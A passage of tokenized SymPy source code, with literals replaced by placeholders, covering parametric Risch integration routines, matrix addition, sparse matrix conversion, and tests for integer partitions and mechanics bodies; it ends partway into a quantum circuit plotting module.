qi in Q ] ) <EOL> M = Matrix ( dc + <NUM_LIT:1> , m , lambda i , j : Q [ j ] . 
nth ( i ) ) <EOL> A , u = constant_system ( M , zeros ( dc + <NUM_LIT:1> , <NUM_LIT:1> ) , DE ) <EOL> c = eye ( m ) <EOL> A = A . row_join ( zeros ( A . rows , m ) ) . col_join ( c . row_join ( - c ) ) <EOL> return ( H , A ) <EOL> def prde_no_cancel_b_small ( b , Q , n , DE ) : <EOL> """<STR_LIT>""" <EOL> m = len ( Q ) <EOL> H = [ Poly ( <NUM_LIT:0> , DE . t ) ] * m <EOL> for N in range ( n , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> for i in range ( m ) : <EOL> si = Q [ i ] . nth ( N + DE . d . degree ( DE . t ) - <NUM_LIT:1> ) / ( N * DE . d . LC ( ) ) <EOL> sitn = Poly ( si * DE . t ** N , DE . t ) <EOL> H [ i ] = H [ i ] + sitn <EOL> Q [ i ] = Q [ i ] - derivation ( sitn , DE ) - b * sitn <EOL> if b . degree ( DE . t ) > <NUM_LIT:0> : <EOL> for i in range ( m ) : <EOL> si = Poly ( Q [ i ] . nth ( b . degree ( DE . t ) ) / b . LC ( ) , DE . t ) <EOL> H [ i ] = H [ i ] + si <EOL> Q [ i ] = Q [ i ] - derivation ( si , DE ) - b * si <EOL> if all ( qi . is_zero for qi in Q ) : <EOL> dc = - <NUM_LIT:1> <EOL> M = Matrix ( ) <EOL> else : <EOL> dc = max ( [ qi . degree ( DE . t ) for qi in Q ] ) <EOL> M = Matrix ( dc + <NUM_LIT:1> , m , lambda i , j : Q [ j ] . nth ( i ) ) <EOL> A , u = constant_system ( M , zeros ( dc + <NUM_LIT:1> , <NUM_LIT:1> ) , DE ) <EOL> c = eye ( m ) <EOL> A = A . row_join ( zeros ( A . rows , m ) ) . col_join ( c . row_join ( - c ) ) <EOL> return ( H , A ) <EOL> else : <EOL> raise NotImplementedError <EOL> def param_rischDE ( fa , fd , G , DE ) : <EOL> """<STR_LIT>""" <EOL> _ , ( fa , fd ) = weak_normalizer ( fa , fd , DE ) <EOL> a , ( ba , bd ) , G , hn = prde_normal_denom ( ga , gd , G , DE ) <EOL> A , B , G , hs = prde_special_denom ( a , ba , bd , G , DE ) <EOL> g = gcd ( A , B ) <EOL> A , B , G = A . quo ( g ) , B . quo ( g ) , [ gia . cancel ( gid * g , include = True ) for <EOL> gia , gid in G ] <EOL> Q , M = prde_linear_constraints ( A , B , G , DE ) <EOL> M , _ = constant_system ( M , zeros ( M . 
rows , <NUM_LIT:1> ) , DE ) <EOL> try : <EOL> n = bound_degree ( A , B , G , DE , parametric = True ) <EOL> except NotImplementedError : <EOL> debug ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> n = oo <EOL> A , B , Q , R , n1 = prde_spde ( A , B , Q , n , DE ) <EOL> def limited_integrate_reduce ( fa , fd , G , DE ) : <EOL> """<STR_LIT>""" <EOL> dn , ds = splitfactor ( fd , DE ) <EOL> E = [ splitfactor ( gd , DE ) for _ , gd in G ] <EOL> En , Es = list ( zip ( * E ) ) <EOL> c = reduce ( lambda i , j : i . lcm ( j ) , ( dn , ) + En ) <EOL> hn = c . gcd ( c . diff ( DE . t ) ) <EOL> a = hn <EOL> b = - derivation ( hn , DE ) <EOL> N = <NUM_LIT:0> <EOL> if DE . case in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> hs = reduce ( lambda i , j : i . lcm ( j ) , ( ds , ) + Es ) <EOL> a = hn * hs <EOL> b = - derivation ( hn , DE ) - ( hn * derivation ( hs , DE ) ) . quo ( hs ) <EOL> mu = min ( order_at_oo ( fa , fd , DE . t ) , min ( [ order_at_oo ( ga , gd , DE . t ) for <EOL> ga , gd in G ] ) ) <EOL> N = hn . degree ( DE . t ) + hs . degree ( DE . t ) + max ( <NUM_LIT:0> , <NUM_LIT:1> - DE . d . degree ( DE . t ) - mu ) <EOL> else : <EOL> raise NotImplementedError <EOL> V = [ ( - a * hn * ga ) . cancel ( gd , include = True ) for ga , gd in G ] <EOL> return ( a , b , a , N , ( a * hn * fa ) . cancel ( fd , include = True ) , V ) <EOL> def limited_integrate ( fa , fd , G , DE ) : <EOL> """<STR_LIT>""" <EOL> fa , fd = fa * Poly ( <NUM_LIT:1> / fd . LC ( ) , DE . t ) , fd . monic ( ) <EOL> A , B , h , N , g , V = limited_integrate_reduce ( fa , fd , G , DE ) <EOL> V = [ g ] + V <EOL> g = A . gcd ( B ) <EOL> A , B , V = A . quo ( g ) , B . quo ( g ) , [ via . cancel ( vid * g , include = True ) for <EOL> via , vid in V ] <EOL> Q , M = prde_linear_constraints ( A , B , V , DE ) <EOL> M , _ = constant_system ( M , zeros ( M . rows , <NUM_LIT:1> ) , DE ) <EOL> l = M . 
nullspace ( ) <EOL> if M == Matrix ( ) or len ( l ) > <NUM_LIT:1> : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif len ( l ) == <NUM_LIT:0> : <EOL> raise NonElementaryIntegralException <EOL> elif len ( l ) == <NUM_LIT:1> : <EOL> if l [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . is_zero : <EOL> raise NonElementaryIntegralException <EOL> else : <EOL> l [ <NUM_LIT:0> ] *= <NUM_LIT:1> / l [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> C = sum ( [ Poly ( i , DE . t ) * q for ( i , q ) in zip ( l [ <NUM_LIT:0> ] , Q ) ] ) <EOL> B , C , m , alpha , beta = spde ( A , B , C , N , DE ) <EOL> y = solve_poly_rde ( B , C , m , DE ) <EOL> return ( ( alpha * y + beta , h ) , list ( l [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] ) ) <EOL> else : <EOL> raise NotImplementedError <EOL> def parametric_log_deriv_heu ( fa , fd , wa , wd , DE , c1 = None ) : <EOL> """<STR_LIT>""" <EOL> c1 = c1 or Dummy ( '<STR_LIT>' ) <EOL> p , a = fa . div ( fd ) <EOL> q , b = wa . div ( wd ) <EOL> B = max ( <NUM_LIT:0> , derivation ( DE . t , DE ) . degree ( DE . t ) - <NUM_LIT:1> ) <EOL> C = max ( p . degree ( DE . t ) , q . degree ( DE . t ) ) <EOL> if q . degree ( DE . t ) > B : <EOL> eqs = [ p . nth ( i ) - c1 * q . nth ( i ) for i in range ( B + <NUM_LIT:1> , C + <NUM_LIT:1> ) ] <EOL> s = solve ( eqs , c1 ) <EOL> if not s or not s [ c1 ] . is_Rational : <EOL> return None <EOL> N , M = s [ c1 ] . as_numer_denom ( ) <EOL> N , M = Poly ( N , DE . t ) , Poly ( M , DE . t ) <EOL> nfmwa = N * fa * wd - M * wa * fd <EOL> nfmwd = fd * wd <EOL> Qv = is_log_deriv_k_t_radical_in_field ( N * fa * wd - M * wa * fd , fd * wd , DE , <EOL> '<STR_LIT>' ) <EOL> if Qv is None : <EOL> return None <EOL> Q , e , v = Qv <EOL> if e != <NUM_LIT:1> : <EOL> return None <EOL> if Q . is_zero or v . is_zero : <EOL> return None <EOL> return ( Q * N , Q * M , v ) <EOL> if p . degree ( DE . t ) > B : <EOL> return None <EOL> c = lcm ( fd . as_poly ( DE . t ) . LC ( ) , wd . as_poly ( DE . t ) . LC ( ) ) <EOL> l = fd . monic ( ) . 
lcm ( wd . monic ( ) ) * Poly ( c , DE . t ) <EOL> ln , ls = splitfactor ( l , DE ) <EOL> z = ls * ln . gcd ( ln . diff ( DE . t ) ) <EOL> if not z . has ( DE . t ) : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> u1 , r1 = ( fa * l . quo ( fd ) ) . div ( z ) <EOL> u2 , r2 = ( wa * l . quo ( wd ) ) . div ( z ) <EOL> eqs = [ r1 . nth ( i ) - c1 * r2 . nth ( i ) for i in range ( z . degree ( DE . t ) ) ] <EOL> s = solve ( eqs , c1 ) <EOL> if not s or not s [ c1 ] . is_Rational : <EOL> return None <EOL> M , N = s [ c1 ] . as_numer_denom ( ) <EOL> nfmwa = N . as_poly ( DE . t ) * fa * wd - M . as_poly ( DE . t ) * wa * fd <EOL> nfmwd = fd * wd <EOL> Qv = is_log_deriv_k_t_radical_in_field ( nfmwa , nfmwd , DE ) <EOL> if Qv is None : <EOL> return None <EOL> Q , v = Qv <EOL> if Q . is_zero or v . is_zero : <EOL> return None <EOL> return ( Q * N , Q * M , v ) <EOL> def parametric_log_deriv ( fa , fd , wa , wd , DE ) : <EOL> A = parametric_log_deriv_heu ( fa , fd , wa , wd , DE ) <EOL> return A <EOL> def is_deriv_k ( fa , fd , DE ) : <EOL> """<STR_LIT>""" <EOL> dfa , dfd = fd * ( fd * derivation ( fa , DE ) - fa * derivation ( fd , DE ) ) , fd ** <NUM_LIT:2> * fa <EOL> dfa , dfd = dfa . cancel ( dfd , include = True ) <EOL> if len ( DE . L_K ) + len ( DE . E_K ) != len ( DE . D ) - <NUM_LIT:1> : <EOL> if [ i for i in DE . cases if i == '<STR_LIT>' ] or set ( [ i for i in DE . cases if i == '<STR_LIT>' ] ) - set ( DE . L_K ) : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> E_part = [ DE . D [ i ] . quo ( Poly ( DE . T [ i ] , DE . T [ i ] ) ) . as_expr ( ) for i in DE . E_K ] <EOL> L_part = [ DE . D [ i ] . as_expr ( ) for i in DE . L_K ] <EOL> lhs = Matrix ( [ E_part + L_part ] ) <EOL> rhs = Matrix ( [ dfa . as_expr ( ) / dfd . as_expr ( ) ] ) <EOL> A , u = constant_system ( lhs , rhs , DE ) <EOL> if not all ( derivation ( i , DE , basic = True ) . 
is_zero for i in u ) or not A : <EOL> return None <EOL> else : <EOL> if not all ( i . is_Rational for i in u ) : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> terms = DE . E_args + [ DE . T [ i ] for i in DE . L_K ] <EOL> ans = list ( zip ( terms , u ) ) <EOL> result = Add ( * [ Mul ( i , j ) for i , j in ans ] ) <EOL> argterms = [ DE . T [ i ] for i in DE . E_K ] + DE . L_args <EOL> l = [ ] <EOL> ld = [ ] <EOL> for i , j in zip ( argterms , u ) : <EOL> i , d = i . as_numer_denom ( ) <EOL> icoeff , iterms = sqf_list ( i ) <EOL> l . append ( Mul ( * ( [ Pow ( icoeff , j ) ] + [ Pow ( b , e * j ) for b , e in iterms ] ) ) ) <EOL> dcoeff , dterms = sqf_list ( d ) <EOL> ld . append ( Mul ( * ( [ Pow ( dcoeff , j ) ] + [ Pow ( b , e * j ) for b , e in dterms ] ) ) ) <EOL> const = cancel ( fa . as_expr ( ) / fd . as_expr ( ) / Mul ( * l ) * Mul ( * ld ) ) <EOL> return ( ans , result , const ) <EOL> def is_log_deriv_k_t_radical ( fa , fd , DE , Df = True ) : <EOL> """<STR_LIT>""" <EOL> H = [ ] <EOL> if Df : <EOL> dfa , dfd = ( fd * derivation ( fa , DE ) - fa * derivation ( fd , DE ) ) . cancel ( fd ** <NUM_LIT:2> , <EOL> include = True ) <EOL> else : <EOL> dfa , dfd = fa , fd <EOL> if len ( DE . L_K ) + len ( DE . E_K ) != len ( DE . D ) - <NUM_LIT:1> : <EOL> if [ i for i in DE . cases if i == '<STR_LIT>' ] or set ( [ i for i in DE . cases if i == '<STR_LIT>' ] ) - set ( DE . L_K ) : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> E_part = [ DE . D [ i ] . quo ( Poly ( DE . T [ i ] , DE . T [ i ] ) ) . as_expr ( ) for i in DE . E_K ] <EOL> L_part = [ DE . D [ i ] . as_expr ( ) for i in DE . L_K ] <EOL> lhs = Matrix ( [ E_part + L_part ] ) <EOL> rhs = Matrix ( [ dfa . as_expr ( ) / dfd . as_expr ( ) ] ) <EOL> A , u = constant_system ( lhs , rhs , DE ) <EOL> if not all ( derivation ( i , DE , basic = True ) . 
is_zero for i in u ) or not A : <EOL> return None <EOL> else : <EOL> if not all ( i . is_Rational for i in u ) : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> n = reduce ( ilcm , [ i . as_numer_denom ( ) [ <NUM_LIT:1> ] for i in u ] ) <EOL> u *= n <EOL> terms = [ DE . T [ i ] for i in DE . E_K ] + DE . L_args <EOL> ans = list ( zip ( terms , u ) ) <EOL> result = Mul ( * [ Pow ( i , j ) for i , j in ans ] ) <EOL> argterms = DE . E_args + [ DE . T [ i ] for i in DE . L_K ] <EOL> const = cancel ( fa . as_expr ( ) / fd . as_expr ( ) - <EOL> Add ( * [ Mul ( i , j / n ) for i , j in zip ( argterms , u ) ] ) ) <EOL> return ( ans , result , n , const ) <EOL> def is_log_deriv_k_t_radical_in_field ( fa , fd , DE , case = '<STR_LIT>' , z = None ) : <EOL> """<STR_LIT>""" <EOL> fa , fd = fa . cancel ( fd , include = True ) <EOL> n , s = splitfactor ( fd , DE ) <EOL> if not s . is_one : <EOL> pass <EOL> z = z or Dummy ( '<STR_LIT:z>' ) <EOL> H , b = residue_reduce ( fa , fd , DE , z = z ) <EOL> if not b : <EOL> return None <EOL> roots = [ ( i , i . real_roots ( ) ) for i , _ in H ] <EOL> if not all ( len ( j ) == i . degree ( ) and all ( k . is_Rational for k in j ) for <EOL> i , j in roots ) : <EOL> return None <EOL> respolys , residues = list ( zip ( * roots ) ) or [ [ ] , [ ] ] <EOL> residueterms = [ ( H [ j ] [ <NUM_LIT:1> ] . subs ( z , i ) , i ) for j in range ( len ( H ) ) for <EOL> i in residues [ j ] ] <EOL> p = cancel ( fa . as_expr ( ) / fd . as_expr ( ) - residue_reduce_derivation ( H , DE , z ) ) <EOL> p = p . as_poly ( DE . t ) <EOL> if p is None : <EOL> return None <EOL> if p . degree ( DE . t ) >= max ( <NUM_LIT:1> , DE . d . degree ( DE . t ) ) : <EOL> return None <EOL> if case == '<STR_LIT>' : <EOL> case = DE . case <EOL> if case == '<STR_LIT>' : <EOL> wa , wd = derivation ( DE . t , DE ) . cancel ( Poly ( DE . t , DE . t ) , include = True ) <EOL> with DecrementLevel ( DE ) : <EOL> pa , pd = frac_in ( p , DE . 
t , cancel = True ) <EOL> wa , wd = frac_in ( ( wa , wd ) , DE . t ) <EOL> A = parametric_log_deriv ( pa , pd , wa , wd , DE ) <EOL> if A is None : <EOL> return None <EOL> n , e , u = A <EOL> u *= DE . t ** e <EOL> elif case == '<STR_LIT>' : <EOL> with DecrementLevel ( DE ) : <EOL> pa , pd = frac_in ( p , DE . t ) <EOL> A = is_log_deriv_k_t_radical_in_field ( pa , pd , DE , case = '<STR_LIT>' ) <EOL> if A is None : <EOL> return None <EOL> n , u = A <EOL> elif case == '<STR_LIT>' : <EOL> if not fd . is_sqf or fa . degree ( ) >= fd . degree ( ) : <EOL> return None <EOL> n = reduce ( ilcm , [ i . as_numer_denom ( ) [ <NUM_LIT:1> ] for _ , i in residueterms ] , S ( <NUM_LIT:1> ) ) <EOL> u = Mul ( * [ Pow ( i , j * n ) for i , j in residueterms ] ) <EOL> return ( n , u ) <EOL> elif case == '<STR_LIT>' : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif case in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise ValueError ( "<STR_LIT>" % case ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % case ) <EOL> common_denom = reduce ( ilcm , [ i . as_numer_denom ( ) [ <NUM_LIT:1> ] for i in [ j for _ , j in <EOL> residueterms ] ] + [ n ] , S ( <NUM_LIT:1> ) ) <EOL> residueterms = [ ( i , j * common_denom ) for i , j in residueterms ] <EOL> m = common_denom // n <EOL> if common_denom != n * m : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> u = cancel ( u ** m * Mul ( * [ Pow ( i , j ) for i , j in residueterms ] ) ) <EOL> return ( common_denom , u ) </s>
<s> from __future__ import print_function , division <EOL> from sympy . core . compatibility import reduce <EOL> from operator import add <EOL> from sympy . core import Add , Basic , sympify <EOL> from sympy . functions import adjoint <EOL> from sympy . matrices . matrices import MatrixBase <EOL> from sympy . matrices . expressions . transpose import transpose <EOL> from sympy . strategies import ( rm_id , unpack , flatten , sort , condition , <EOL> exhaust , do_one , glom ) <EOL> from sympy . matrices . expressions . matexpr import MatrixExpr , ShapeError , ZeroMatrix <EOL> from sympy . utilities import default_sort_key , sift <EOL> class MatAdd ( MatrixExpr ) : <EOL> """<STR_LIT>""" <EOL> is_MatAdd = True <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> args = list ( map ( sympify , args ) ) <EOL> check = kwargs . get ( '<STR_LIT>' , True ) <EOL> obj = Basic . __new__ ( cls , * args ) <EOL> if check : <EOL> validate ( * args ) <EOL> return obj <EOL> @ property <EOL> def shape ( self ) : <EOL> return self . args [ <NUM_LIT:0> ] . shape <EOL> def _entry ( self , i , j ) : <EOL> return Add ( * [ arg . _entry ( i , j ) for arg in self . args ] ) <EOL> def _eval_transpose ( self ) : <EOL> return MatAdd ( * [ transpose ( arg ) for arg in self . args ] ) . doit ( ) <EOL> def _eval_adjoint ( self ) : <EOL> return MatAdd ( * [ adjoint ( arg ) for arg in self . args ] ) . doit ( ) <EOL> def _eval_trace ( self ) : <EOL> from . trace import trace <EOL> return Add ( * [ trace ( arg ) for arg in self . args ] ) . doit ( ) <EOL> def doit ( self , ** kwargs ) : <EOL> deep = kwargs . get ( '<STR_LIT>' , True ) <EOL> if deep : <EOL> args = [ arg . doit ( ** kwargs ) for arg in self . args ] <EOL> else : <EOL> args = self . args <EOL> return canonicalize ( MatAdd ( * args ) ) <EOL> def validate ( * args ) : <EOL> if not all ( arg . 
is_Matrix for arg in args ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> A = args [ <NUM_LIT:0> ] <EOL> for B in args [ <NUM_LIT:1> : ] : <EOL> if A . shape != B . shape : <EOL> raise ShapeError ( "<STR_LIT>" % ( A , B ) ) <EOL> factor_of = lambda arg : arg . as_coeff_mmul ( ) [ <NUM_LIT:0> ] <EOL> matrix_of = lambda arg : unpack ( arg . as_coeff_mmul ( ) [ <NUM_LIT:1> ] ) <EOL> def combine ( cnt , mat ) : <EOL> if cnt == <NUM_LIT:1> : <EOL> return mat <EOL> else : <EOL> return cnt * mat <EOL> def merge_explicit ( matadd ) : <EOL> """<STR_LIT>""" <EOL> groups = sift ( matadd . args , lambda arg : isinstance ( arg , MatrixBase ) ) <EOL> if len ( groups [ True ] ) > <NUM_LIT:1> : <EOL> return MatAdd ( * ( groups [ False ] + [ reduce ( add , groups [ True ] ) ] ) ) <EOL> else : <EOL> return matadd <EOL> rules = ( rm_id ( lambda x : x == <NUM_LIT:0> or isinstance ( x , ZeroMatrix ) ) , <EOL> unpack , <EOL> flatten , <EOL> glom ( matrix_of , factor_of , combine ) , <EOL> merge_explicit , <EOL> sort ( default_sort_key ) ) <EOL> canonicalize = exhaust ( condition ( lambda x : isinstance ( x , MatAdd ) , <EOL> do_one ( * rules ) ) ) </s>
<s> from __future__ import print_function , division <EOL> from sympy . core . compatibility import range <EOL> from sympy import SparseMatrix <EOL> def _doktocsr ( dok ) : <EOL> """<STR_LIT>""" <EOL> row , JA , A = [ list ( i ) for i in zip ( * dok . row_list ( ) ) ] <EOL> IA = [ <NUM_LIT:0> ] * ( ( row [ <NUM_LIT:0> ] if row else <NUM_LIT:0> ) + <NUM_LIT:1> ) <EOL> for i , r in enumerate ( row ) : <EOL> IA . extend ( [ i ] * ( r - row [ i - <NUM_LIT:1> ] ) ) <EOL> IA . extend ( [ len ( A ) ] * ( dok . rows - len ( IA ) + <NUM_LIT:1> ) ) <EOL> shape = [ dok . rows , dok . cols ] <EOL> return [ A , JA , IA , shape ] <EOL> def _csrtodok ( csr ) : <EOL> """<STR_LIT>""" <EOL> smat = { } <EOL> A , JA , IA , shape = csr <EOL> for i in range ( len ( IA ) - <NUM_LIT:1> ) : <EOL> indices = slice ( IA [ i ] , IA [ i + <NUM_LIT:1> ] ) <EOL> for l , m in zip ( A [ indices ] , JA [ indices ] ) : <EOL> smat [ i , m ] = l <EOL> return SparseMatrix ( * ( shape + [ smat ] ) ) </s>
<s> from sympy . core . compatibility import range <EOL> from sympy . ntheory import npartitions <EOL> def test_partitions ( ) : <EOL> assert [ npartitions ( k ) for k in range ( <NUM_LIT> ) ] == [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> assert npartitions ( <NUM_LIT:100> ) == <NUM_LIT> <EOL> assert npartitions ( <NUM_LIT:200> ) == <NUM_LIT> <EOL> assert npartitions ( <NUM_LIT:1000> ) == <NUM_LIT> <EOL> assert npartitions ( <NUM_LIT> ) == <NUM_LIT> <EOL> assert npartitions ( <NUM_LIT> ) % <NUM_LIT:10> ** <NUM_LIT:10> == <NUM_LIT> <EOL> assert npartitions ( <NUM_LIT> ) % <NUM_LIT:10> ** <NUM_LIT:10> == <NUM_LIT> </s>
<s> from sympy import Symbol , symbols <EOL> from sympy . physics . vector import Point , ReferenceFrame <EOL> from sympy . physics . mechanics import inertia , Body <EOL> from sympy . utilities . pytest import raises <EOL> def test_default ( ) : <EOL> body = Body ( '<STR_LIT:body>' ) <EOL> assert body . name == '<STR_LIT:body>' <EOL> assert body . loads == [ ] <EOL> point = Point ( '<STR_LIT>' ) <EOL> point . set_vel ( body . frame , <NUM_LIT:0> ) <EOL> com = body . masscenter <EOL> frame = body . frame <EOL> assert com . vel ( frame ) == point . vel ( frame ) <EOL> assert body . mass == Symbol ( '<STR_LIT>' ) <EOL> ixx , iyy , izz = symbols ( '<STR_LIT>' ) <EOL> ixy , iyz , izx = symbols ( '<STR_LIT>' ) <EOL> assert body . inertia == ( inertia ( body . frame , ixx , iyy , izz , ixy , iyz , izx ) , <EOL> body . masscenter ) <EOL> def test_custom_rigid_body ( ) : <EOL> rigidbody_masscenter = Point ( '<STR_LIT>' ) <EOL> rigidbody_mass = Symbol ( '<STR_LIT>' ) <EOL> rigidbody_frame = ReferenceFrame ( '<STR_LIT>' ) <EOL> body_inertia = inertia ( rigidbody_frame , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> rigid_body = Body ( '<STR_LIT>' , rigidbody_masscenter , rigidbody_mass , <EOL> rigidbody_frame , body_inertia ) <EOL> com = rigid_body . masscenter <EOL> frame = rigid_body . frame <EOL> rigidbody_masscenter . set_vel ( rigidbody_frame , <NUM_LIT:0> ) <EOL> assert com . vel ( frame ) == rigidbody_masscenter . vel ( frame ) <EOL> assert com . pos_from ( com ) == rigidbody_masscenter . pos_from ( com ) <EOL> assert rigid_body . mass == rigidbody_mass <EOL> assert rigid_body . 
inertia == ( body_inertia , rigidbody_masscenter ) <EOL> assert hasattr ( rigid_body , '<STR_LIT>' ) <EOL> assert hasattr ( rigid_body , '<STR_LIT>' ) <EOL> assert hasattr ( rigid_body , '<STR_LIT>' ) <EOL> assert hasattr ( rigid_body , '<STR_LIT>' ) <EOL> def test_particle_body ( ) : <EOL> particle_masscenter = Point ( '<STR_LIT>' ) <EOL> particle_mass = Symbol ( '<STR_LIT>' ) <EOL> particle_frame = ReferenceFrame ( '<STR_LIT>' ) <EOL> particle_body = Body ( '<STR_LIT>' , particle_masscenter , particle_mass , <EOL> particle_frame ) <EOL> com = particle_body . masscenter <EOL> frame = particle_body . frame <EOL> particle_masscenter . set_vel ( particle_frame , <NUM_LIT:0> ) <EOL> assert com . vel ( frame ) == particle_masscenter . vel ( frame ) <EOL> assert com . pos_from ( com ) == particle_masscenter . pos_from ( com ) <EOL> assert particle_body . mass == particle_mass <EOL> assert not hasattr ( particle_body , "<STR_LIT>" ) <EOL> assert hasattr ( particle_body , '<STR_LIT>' ) <EOL> assert hasattr ( particle_body , '<STR_LIT>' ) <EOL> assert hasattr ( particle_body , '<STR_LIT>' ) <EOL> def test_particle_body_add_force ( ) : <EOL> particle_masscenter = Point ( '<STR_LIT>' ) <EOL> particle_mass = Symbol ( '<STR_LIT>' ) <EOL> particle_frame = ReferenceFrame ( '<STR_LIT>' ) <EOL> particle_body = Body ( '<STR_LIT>' , particle_masscenter , particle_mass , <EOL> particle_frame ) <EOL> a = Symbol ( '<STR_LIT:a>' ) <EOL> force_vector = a * particle_body . frame . x <EOL> particle_body . apply_force ( force_vector , particle_body . masscenter ) <EOL> assert len ( particle_body . loads ) == <NUM_LIT:1> <EOL> point = particle_body . masscenter . locatenew ( <EOL> particle_body . _name + '<STR_LIT>' , <NUM_LIT:0> ) <EOL> point . set_vel ( particle_body . frame , <NUM_LIT:0> ) <EOL> force_point = particle_body . loads [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> frame = particle_body . frame <EOL> assert force_point . vel ( frame ) == point . vel ( frame ) <EOL> assert force_point . 
pos_from ( force_point ) == point . pos_from ( force_point ) <EOL> assert particle_body . loads [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] == force_vector <EOL> def test_body_add_force ( ) : <EOL> rigidbody_masscenter = Point ( '<STR_LIT>' ) <EOL> rigidbody_mass = Symbol ( '<STR_LIT>' ) <EOL> rigidbody_frame = ReferenceFrame ( '<STR_LIT>' ) <EOL> body_inertia = inertia ( rigidbody_frame , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> rigid_body = Body ( '<STR_LIT>' , rigidbody_masscenter , rigidbody_mass , <EOL> rigidbody_frame , body_inertia ) <EOL> l = Symbol ( '<STR_LIT:l>' ) <EOL> Fa = Symbol ( '<STR_LIT>' ) <EOL> point = rigid_body . masscenter . locatenew ( <EOL> '<STR_LIT>' , <EOL> l * rigid_body . frame . x ) <EOL> point . set_vel ( rigid_body . frame , <NUM_LIT:0> ) <EOL> force_vector = Fa * rigid_body . frame . z <EOL> rigid_body . apply_force ( force_vector , point ) <EOL> assert len ( rigid_body . loads ) == <NUM_LIT:1> <EOL> force_point = rigid_body . loads [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> frame = rigid_body . frame <EOL> assert force_point . vel ( frame ) == point . vel ( frame ) <EOL> assert force_point . pos_from ( force_point ) == point . pos_from ( force_point ) <EOL> assert rigid_body . loads [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] == force_vector <EOL> rigid_body . apply_force ( force_vector ) <EOL> assert len ( rigid_body . loads ) == <NUM_LIT:2> <EOL> assert rigid_body . loads [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] == force_vector <EOL> raises ( TypeError , lambda : rigid_body . apply_force ( force_vector , <NUM_LIT:0> ) ) <EOL> raises ( TypeError , lambda : rigid_body . apply_force ( <NUM_LIT:0> ) ) <EOL> def test_body_add_torque ( ) : <EOL> body = Body ( '<STR_LIT:body>' ) <EOL> torque_vector = body . frame . x <EOL> body . apply_torque ( torque_vector ) <EOL> assert len ( body . loads ) == <NUM_LIT:1> <EOL> assert body . loads [ <NUM_LIT:0> ] == ( body . frame , torque_vector ) <EOL> raises ( TypeError , lambda : body . apply_torque ( <NUM_LIT:0> ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from sympy import Mul <EOL> from sympy . core . compatibility import u , range <EOL> from sympy . external import import_module <EOL> from sympy . physics . quantum . gate import Gate , OneQubitGate , CGate , CGateS <EOL> from sympy . core . core import BasicMeta <EOL> from sympy . core . assumptions import ManagedProperties <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> np = import_module ( '<STR_LIT>' ) <EOL> matplotlib = import_module ( <EOL> '<STR_LIT>' , __import__kwargs = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> catch = ( RuntimeError , ) ) <EOL> if not np or not matplotlib : <EOL> class CircuitPlot ( object ) : <EOL> def __init__ ( * args , ** kwargs ) : <EOL> raise ImportError ( '<STR_LIT>' ) <EOL> def circuit_plot ( * args , ** kwargs ) : <EOL> raise ImportError ( '<STR_LIT>' ) <EOL> else : <EOL> pyplot = matplotlib . pyplot <EOL> Line2D = matplotlib . lines . Line2D <EOL> Circle = matplotlib . patches . Circle <EOL> class CircuitPlot ( object ) : <EOL> """<STR_LIT>""" <EOL> scale = <NUM_LIT:1.0> <EOL> fontsize = <NUM_LIT> <EOL> linewidth = <NUM_LIT:1.0> <EOL> control_radius = <NUM_LIT> <EOL> not_radius = <NUM_LIT> <EOL> swap_delta = <NUM_LIT> <EOL> labels = [ ] <EOL> inits = { } <EOL> label_buffer = <NUM_LIT:0.5> <EOL> def __init__ ( self , c , nqubits , ** kwargs ) : <EOL> self . circuit = c <EOL> self . ngates = len ( self . circuit . args ) <EOL> self . nqubits = nqubits <EOL> self . update ( kwargs ) <EOL> self . _create_grid ( ) <EOL> self . _create_figure ( ) <EOL> self . _plot_wires ( ) <EOL> self . _plot_gates ( ) <EOL> self . _finish ( ) <EOL> def update ( self , kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ . update ( kwargs ) <EOL> def _create_grid ( self ) : <EOL> """<STR_LIT>""" <EOL> scale = self . scale <EOL> wire_grid = np . 
